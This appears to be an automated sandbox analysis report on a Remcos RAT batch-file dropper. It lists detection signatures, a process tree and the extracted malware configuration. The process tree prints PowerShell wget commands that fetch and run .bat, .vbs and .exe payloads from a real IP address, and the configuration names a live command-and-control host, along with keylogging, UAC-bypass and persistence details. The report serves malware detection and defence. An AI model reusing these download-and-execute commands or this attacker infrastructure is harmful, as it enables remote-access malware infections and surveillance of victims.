Edit tour
Windows
Analysis Report
55Ka50lb6Z.bat
Overview
General Information
Sample name: | 55Ka50lb6Z.batrenamed because original name is a hash value |
Original sample name: | 4d8b2d19bdd29e6d89e0769cff9b0b48.bat |
Analysis ID: | 1518340 |
MD5: | 4d8b2d19bdd29e6d89e0769cff9b0b48 |
SHA1: | 07c4469751a5ddf43288b8ea7d32afce71783a2c |
SHA256: | 1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e |
Tags: | batuser-abuse_ch |
Infos: | |
Detection
Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 3580 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\55Ka5 0lb6Z.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3380 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4304 cmdline:
powershell wget http ://172.94. 3.25/ffo.b at -OutFil e C:\Users \user\AppD ata\Roamin g/ffo.bat MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 3968 cmdline:
powershell wget http ://172.94. 3.25/hi.vb s -OutFile C:\Users\ user\AppDa ta\Roaming /hi.vbs MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 3428 cmdline:
cmd /c C:\ Users\user \AppData\R oaming/hi. vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 948 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\hi.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6512 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\ffo.bat " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3064 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5936 cmdline:
powershell wget http ://172.94. 3.25/AUGUS T.exe -Out File C:\Us ers\user\A ppData\Roa ming/AUGUS T.exe MD5: 04029E121A0CFA5991749937DD22A1D9) - AUGUST.exe (PID: 3840 cmdline:
C:\Users\u ser\AppDat a\Roaming/ AUGUST.exe MD5: 25860926414BF43383246F7C773A8D6C) - DZIPR.exe (PID: 4568 cmdline:
"C:\Users\ user\DZIPR .exe" MD5: EC9CE1D67F98072281015C7726FBA245) - DZIPR.exe (PID: 5464 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Ruy_driver v2\DZIPR.e xe MD5: EC9CE1D67F98072281015C7726FBA245) - cmd.exe (PID: 5476 cmdline:
C:\Windows \SysWOW64\ cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3108 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - explorer.exe (PID: 4016 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: DD6597597673F72E10C9DE7901FBA0A8)
- svchost.exe (PID: 3700 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- DZIPR.exe (PID: 6392 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Ruy_driver v2\DZIPR.e xe MD5: EC9CE1D67F98072281015C7726FBA245) - cmd.exe (PID: 5900 cmdline:
C:\Windows \SysWOW64\ cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4304 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - explorer.exe (PID: 4256 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: DD6597597673F72E10C9DE7901FBA0A8)
- DZIPR.exe (PID: 508 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Ruy_drive rv2\DZIPR. exe" MD5: EC9CE1D67F98072281015C7726FBA245) - cmd.exe (PID: 1488 cmdline:
C:\Windows \SysWOW64\ cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5984 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - explorer.exe (PID: 5972 cmdline:
C:\Windows \SysWOW64\ explorer.e xe MD5: DD6597597673F72E10C9DE7901FBA0A8)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 15 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
Click to see the 52 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
Click to see the 74 entries |
System Summary |
---|
Source: | Author: Subhash Popuri (@pbssubhash): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: |
Source: | Author: vburov: |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Binary or memory string: | memstr_64955134-1 |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 14_2_0040301A | |
Source: | Code function: | 14_2_00402B79 | |
Source: | Code function: | 15_2_6FA6748E | |
Source: | Code function: | 16_2_6C53748E | |
Source: | Code function: | 20_2_6FD0748E |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Software Vulnerabilities |
---|
Source: | Child: |
Networking |
---|
Source: | URLs: |
Source: | HTTP traffic detected: |